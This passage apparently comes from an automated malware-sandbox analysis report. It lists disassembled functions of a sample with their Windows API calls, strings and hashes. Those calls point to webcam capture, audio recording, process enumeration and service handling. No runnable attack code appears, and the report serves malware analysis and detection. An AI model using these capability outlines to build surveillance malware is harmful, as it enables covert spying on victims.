                                              • Instruction ID: fb3966564bde1ae5369eebf9c43c31a82fbae7a7d40ab1934acf644b09ac977e
                                              • Opcode Fuzzy Hash: 902d79527c9160b4a98a9d8304a3f6424f6fd6edd60f8cfbd40e1d5242165d61
                                              • Instruction Fuzzy Hash: 74E01A26B08120B7962433BA6E4FCEF3E39DBC3B70745406EFA0456692DA50095286F3
                                              Function 00402D90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 004076BA: __EH_prolog.LIBCMT ref: 004076BF
                                                • Part of subcall function 004076BA: GetSystemDirectoryA.KERNEL32(?,00000400), ref: 004076F9
                                                • Part of subcall function 004076BA: _strncat.LIBCMT ref: 0040770C
                                                • Part of subcall function 004076BA: _strncat.LIBCMT ref: 00407786
                                              • CloseServiceHandle.ADVAPI32(?), ref: 00402DE6
                                              • CloseServiceHandle.ADVAPI32(?), ref: 00402DEE
                                              • GetLastError.KERNEL32 ref: 00402DF0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: CloseHandleService_strncat$DirectoryErrorH_prologLastSystem
                                              • String ID: ERROR$Failed to start PnkBstrA service
                                              • API String ID: 2671922418-177627567
                                              • Opcode ID: ec03abff27e189f0570cde6ee349a6b5db4ab6f28ff478a2f9be88eaa58b738d
                                              • Instruction ID: 01776ab97a73c0c806ad562cde7058c9eb851f531a22512e06677a1d816b8581
                                              • Opcode Fuzzy Hash: ec03abff27e189f0570cde6ee349a6b5db4ab6f28ff478a2f9be88eaa58b738d
                                              • Instruction Fuzzy Hash: D0F090355007449FCB11AB61DC45CEA77B2FF88750F1044EDF14A9A1A0CB352A80CF05
                                              Function 000DBE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,000DBF02), ref: 000DBE79
                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,000DBF02), ref: 000DBE86
                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,000DBF02), ref: 000DBE93
                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,000DBF02), ref: 000DBEA6
                                              Strings
                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 000DBE99
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                              • API String ID: 3024135584-2418719853
                                              • Opcode ID: b4d569746b6627488b82e9d040f7c23004983b6c413abafc2dd20221ea00b5ff
                                              • Instruction ID: 966055499ac6e1a21239f6923849f4390f9a8dc59f4d62fc04723e9ac13f39ae
                                              • Opcode Fuzzy Hash: b4d569746b6627488b82e9d040f7c23004983b6c413abafc2dd20221ea00b5ff
                                              • Instruction Fuzzy Hash: 97E08673248248BBD31837F5AD8ECEF3B7CE785712B044515FA12907D2DA7044848670
                                              Function 0040902D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040903F
                                              • GetProcAddress.KERNEL32(00000000), ref: 00409046
                                              • GetCurrentProcess.KERNEL32(00000000), ref: 00409059
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: AddressCurrentHandleModuleProcProcess
                                              • String ID: IsWow64Process$kernel32
                                              • API String ID: 4190356694-3789238822
                                              • Opcode ID: 4d39c8669cf566aea2a0cfb047afcbf8134d52e3e86177dd4aa2fb2500acd86a
                                              • Instruction ID: b2889b05f1dad1e2f3c50c1bb822b6e8b82adfdb205b460a6e2e4a438975ea47
                                              • Opcode Fuzzy Hash: 4d39c8669cf566aea2a0cfb047afcbf8134d52e3e86177dd4aa2fb2500acd86a
                                              • Instruction Fuzzy Hash: 99E04F74941348EBEB40DFB1DC4DB8977ACEB04706F200065B501E25A1D7789A448B18
                                              Function 0010016A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8da8861976047c33e2a96445b3b3fb5c9b693f0c0acc479643fd1f748a23db9a
                                              • Instruction ID: c3292fa41abb0b7b1a37d2742f457603fbf83703dc13743c6fc6a5608451f2da
                                              • Opcode Fuzzy Hash: 8da8861976047c33e2a96445b3b3fb5c9b693f0c0acc479643fd1f748a23db9a
                                              • Instruction Fuzzy Hash: 2771913190061A9FCB278B55C884BBFBB75FF59360F144229E895AB1C1DBF09D81CBA1
                                              Function 000D0B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000D05B9: SetLastError.KERNEL32(0000000D,000D0B38,?,00000000), ref: 000D05BF
                                              • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,000D0B15), ref: 000D0BC4
                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 000D0C2A
                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 000D0C31
                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000D0D3F
                                              • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,000D0B15), ref: 000D0D69
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                              • String ID:
                                              • API String ID: 3525466593-0
                                              • Opcode ID: 52b81f30389fdc70d90d0f3926259370642d0b6a161d85254e9b8d59ab558572
                                              • Instruction ID: e8e790079d861cd165c7fd42d744f17320cd281bbc0625e68362a254ac43e6ec
                                              • Opcode Fuzzy Hash: 52b81f30389fdc70d90d0f3926259370642d0b6a161d85254e9b8d59ab558572
                                              • Instruction Fuzzy Hash: 1961A1702007059BDB609F69CD81B6A7BE6BF84710F44411BF90D8B786EBB4E855CBB2
                                              Function 00103F7B Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00106AFF: RtlAllocateHeap.NTDLL(00000000,000F4403,?,?,000F7227,?,?,?,?,?,000CCC87,000F4403,?,?,?,?), ref: 00106B31
                                              • _free.LIBCMT ref: 00104086
                                              • _free.LIBCMT ref: 0010409D
                                              • _free.LIBCMT ref: 001040BC
                                              • _free.LIBCMT ref: 001040D7
                                              • _free.LIBCMT ref: 001040EE
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$AllocateHeap
                                              • String ID:
                                              • API String ID: 3033488037-0
                                              • Opcode ID: 43d016fd051c3b2bccd88b2b9b869c50cbb699ecf089f191a2de090f9720e3c7
                                              • Instruction ID: f1832dfc0f1d252eee5e321e8e8d67f292c7467334e1b05e89be427abfc81c3b
                                              • Opcode Fuzzy Hash: 43d016fd051c3b2bccd88b2b9b869c50cbb699ecf089f191a2de090f9720e3c7
                                              • Instruction Fuzzy Hash: 1251F771A00208EFDB24DF69DC81AAA77F4EF54320F144169FA89E72D4E7B1E951CB40
                                              Function 004C5C2A Relevance: 7.7, APIs: 5, Instructions: 184COMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,004BD355,?), ref: 004C5CDD
                                              • InterlockedExchange.KERNEL32(006E5828,00000001), ref: 004C5D5B
                                              • InterlockedExchange.KERNEL32(006E5828,00000000), ref: 004C5DC0
                                              • InterlockedExchange.KERNEL32(006E5828,00000001), ref: 004C5DE4
                                              • InterlockedExchange.KERNEL32(006E5828,00000000), ref: 004C5E44
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: ExchangeInterlocked$QueryVirtual
                                              • String ID:
                                              • API String ID: 2947987494-0
                                              • Opcode ID: 0997a2d5fa3fa2299e1212705d19e1cf62f61f8327e0e6827bbd249c09d78027
                                              • Instruction ID: d4fd967b9ef2ddb5f493da4d0830cd1fabe8dda03b298e9488f7d68cad15bcae
                                              • Opcode Fuzzy Hash: 0997a2d5fa3fa2299e1212705d19e1cf62f61f8327e0e6827bbd249c09d78027
                                              • Instruction Fuzzy Hash: C951C238A00F518FDFA48B58D8C4F6E73A5EB41714F64812FD4129B2A5D778F9C28A48
                                              Function 004BF798 Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb2e1ef7f134cbd150f3a8f1cad5c3c71ba5ec4d18e13d1a1c7ae3d541101f7a
                                              • Instruction ID: 06e022bca2f044a232651a0051462ae43df652e2cdae1c6bcfd5a88350d1bcd9
                                              • Opcode Fuzzy Hash: bb2e1ef7f134cbd150f3a8f1cad5c3c71ba5ec4d18e13d1a1c7ae3d541101f7a
                                              • Instruction Fuzzy Hash: BD41B1B5C00265AACF20BF769C84AEF7A64EB41728710413FF919A62A1D73C4D458BBD
                                              Function 000C3DE7 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 135sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNEL32(00000000), ref: 000C3E8A
                                                • Part of subcall function 000C3FCD: __EH_prolog.LIBCMT ref: 000C3FD2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologSleep
                                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                              • API String ID: 3469354165-3547787478
                                              • Opcode ID: 9af908b6b1f96449d0e8cea9e32d22f3aee331d98e465cbe3faf00872f5b81ea
                                              • Instruction ID: fa16b9b65d6158734b2cceea406a15839b2b3d7302c1ad1cb4819e9f053d2483
                                              • Opcode Fuzzy Hash: 9af908b6b1f96449d0e8cea9e32d22f3aee331d98e465cbe3faf00872f5b81ea
                                              • Instruction Fuzzy Hash: 8E41A131A18250A7CB14FB78D856FED7BB16B42700F00892DF80697AD7EF308A46C792
                                              Function 000CE6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000DB15B: GetCurrentProcess.KERNEL32(?,?,?,000CC914,WinDir,00000000,00000000), ref: 000DB16C
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000CE6C1
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 000CE6E5
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 000CE6F4
                                              • CloseHandle.KERNEL32(00000000), ref: 000CE8AB
                                                • Part of subcall function 000DB187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,000CE4D0,00000000,?,?,00134358), ref: 000DB19C
                                                • Part of subcall function 000DB37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 000DB395
                                                • Part of subcall function 000DB37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 000DB3A8
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 000CE89C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 4269425633-0
                                              • Opcode ID: e7ff7dc37328e10b1f68027601610fb6cc9f43bc7fb40cacd7a4d1f721d78136
                                              • Instruction ID: 7ab0a350749d992c034ad3ccf5fd2a34261d1a43ff0ca41e7f0968e37a2d2dd4
                                              • Opcode Fuzzy Hash: e7ff7dc37328e10b1f68027601610fb6cc9f43bc7fb40cacd7a4d1f721d78136
                                              • Instruction Fuzzy Hash: 7141CF311083509BC325F760DDA2FEF77A5AFA6300F50452DF98A86293EF30AA49C656
                                              Function 00103098 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: ff9dd77244b00e03d7ef63492651198d63d28d6f3ccd05d3894caacb64bd3055
                                              • Instruction ID: e9af3800b8d8fbb63d99e5c70aa2d5716b153cdf639824cc494933793489a89c
                                              • Opcode Fuzzy Hash: ff9dd77244b00e03d7ef63492651198d63d28d6f3ccd05d3894caacb64bd3055
                                              • Instruction Fuzzy Hash: DD41C536B00204AFCB24DF78C881A6DB7E5EF89714F158569E965EB381DB71EE01CB80
                                              Function 0010FED3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,000FE3ED,?,00000000,?,00000001,?,?,00000001,000FE3ED,?), ref: 0010FF20
                                              • __alloca_probe_16.LIBCMT ref: 0010FF58
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0010FFA9
                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,000F99BF,?), ref: 0010FFBB
                                              • __freea.LIBCMT ref: 0010FFC4
                                                • Part of subcall function 00106AFF: RtlAllocateHeap.NTDLL(00000000,000F4403,?,?,000F7227,?,?,?,?,?,000CCC87,000F4403,?,?,?,?), ref: 00106B31
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                              • String ID:
                                              • API String ID: 313313983-0
                                              • Opcode ID: 21d0c8f175cb8d4ed043b9eaf77cf8cb7dc44678ba34d8eabc09900d475eebe8
                                              • Instruction ID: cde271786776c5f6690bd1fcba7d8140d89347da14852b899b33ad190c07847a
                                              • Opcode Fuzzy Hash: 21d0c8f175cb8d4ed043b9eaf77cf8cb7dc44678ba34d8eabc09900d475eebe8
                                              • Instruction Fuzzy Hash: E531FE32A0021BABDB289F64DC42EEE7BA5EB45310F05416DFC04D7691EB75CD52CBA0
                                              Function 000C196B Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 000C197B
                                              • waveInOpen.WINMM(00131AF8,000000FF,00131B00,Function_00001A8E,00000000,00000000,00000024), ref: 000C1A11
                                              • waveInPrepareHeader.WINMM(00131AC0,00000020,00000000), ref: 000C1A66
                                              • waveInAddBuffer.WINMM(00131AC0,00000020), ref: 000C1A75
                                              • waveInStart.WINMM ref: 000C1A81
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                              • String ID:
                                              • API String ID: 1356121797-0
                                              • Opcode ID: 05a4634b678c90e95d5e7e15df972cb167750a229b03815be8a7bd8b5cfc84dd
                                              • Instruction ID: 31ae22179cd6f14f0c0476d32b62391b867c659be28e7f8a828f12feb5e921cf
                                              • Opcode Fuzzy Hash: 05a4634b678c90e95d5e7e15df972cb167750a229b03815be8a7bd8b5cfc84dd
                                              • Instruction Fuzzy Hash: 02216D31601280BBC7089F66AE15AAABBB5FB95752B00812EF115D7EF5EB744880CB04
                                              Function 000CFBEF Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                              Download Yara Rule
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000CFBFC
                                              • int.LIBCPMT ref: 000CFC0F
                                                • Part of subcall function 000CCEE0: std::_Lockit::_Lockit.LIBCPMT ref: 000CCEF1
                                                • Part of subcall function 000CCEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 000CCF0B
                                              • std::_Facet_Register.LIBCPMT ref: 000CFC4B
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 000CFC71
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 000CFC8D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                              • String ID:
                                              • API String ID: 2536120697-0
                                              • Opcode ID: 50440171058142de69dc4ed9e3da6fb150c4fefe01dbe7864fd61b4c69fad84a
                                              • Instruction ID: 7ff3fb1c687ad83ed6884db8d940c4953807b613b513f20394259f2bfdf1eeb0
                                              • Opcode Fuzzy Hash: 50440171058142de69dc4ed9e3da6fb150c4fefe01dbe7864fd61b4c69fad84a
                                              • Instruction Fuzzy Hash: 3D11E432A0051DA7CB14FBA4D986EFEB76A9F40750F20006DF905B7282EB309F42D792
                                              Function 0010E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 0010E144
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0010E167
                                                • Part of subcall function 00106AFF: RtlAllocateHeap.NTDLL(00000000,000F4403,?,?,000F7227,?,?,?,?,?,000CCC87,000F4403,?,?,?,?), ref: 00106B31
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0010E18D
                                              • _free.LIBCMT ref: 0010E1A0
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0010E1AF
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                              • String ID:
                                              • API String ID: 336800556-0
                                              • Opcode ID: 7e4f31e6c2233a6dc56e75bf3b278f9ec9ccf57d4789e0ef5a5d3b9badedebf3
                                              • Instruction ID: 3ee9f64dd9982350ff43bfbc0182e6b5da18cbbcb2bcefde2113e8c165dc35bb
                                              • Opcode Fuzzy Hash: 7e4f31e6c2233a6dc56e75bf3b278f9ec9ccf57d4789e0ef5a5d3b9badedebf3
                                              • Instruction Fuzzy Hash: 2301B1726012157FA3256ABB6C8CCBB6ABDDEC2BA13194528BD44C62C0DBB08C0191B0
                                              Function 000CFED2 Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                              Download Yara Rule
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000CFEDF
                                              • int.LIBCPMT ref: 000CFEF2
                                                • Part of subcall function 000CCEE0: std::_Lockit::_Lockit.LIBCPMT ref: 000CCEF1
                                                • Part of subcall function 000CCEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 000CCF0B
                                              • std::_Facet_Register.LIBCPMT ref: 000CFF2E
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 000CFF54
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 000CFF70
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                              • String ID:
                                              • API String ID: 2536120697-0
                                              • Opcode ID: 2ae572a2ca79acc0057f54815d16b2bce0bfe71b29af1f9caab2507da6868338
                                              • Instruction ID: 746812ca4cdccb03f6b4aecd6e643f600d8fcc74ddb88cc986fed3e825804925
                                              • Opcode Fuzzy Hash: 2ae572a2ca79acc0057f54815d16b2bce0bfe71b29af1f9caab2507da6868338
                                              • Instruction Fuzzy Hash: D1119E31900519ABCB15FBA4C946EEEB77ADF41714B20006DF909A7292EF30AF06D792
                                              Function 00106F43 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(000F4403,000F4403,?,00105359,00106B42,?,?,000F7227,?,?,?,?,?,000CCC87,000F4403,?), ref: 00106F48
                                              • _free.LIBCMT ref: 00106F7D
                                              • _free.LIBCMT ref: 00106FA4
                                              • SetLastError.KERNEL32(00000000,?,000F4403), ref: 00106FB1
                                              • SetLastError.KERNEL32(00000000,?,000F4403), ref: 00106FBA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$_free
                                              • String ID:
                                              • API String ID: 3170660625-0
                                              • Opcode ID: 40944695f67bca0d5f80942cecc76a0999d32b2dd1ff1d2b900db1b545844939
                                              • Instruction ID: 24404740e8dd258d3b4b49c99a39a3b25924c9368c4ed07e965c7708ffd181b4
                                              • Opcode Fuzzy Hash: 40944695f67bca0d5f80942cecc76a0999d32b2dd1ff1d2b900db1b545844939
                                              • Instruction Fuzzy Hash: AB01F43620C7026BC61622747D95D6F25799BE63B07260128F994E22C2EFF4DC658120
                                              Function 0010F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 0010F7B5
                                                • Part of subcall function 00106AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?), ref: 00106ADB
                                                • Part of subcall function 00106AC5: GetLastError.KERNEL32(?,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?,?), ref: 00106AED
                                              • _free.LIBCMT ref: 0010F7C7
                                              • _free.LIBCMT ref: 0010F7D9
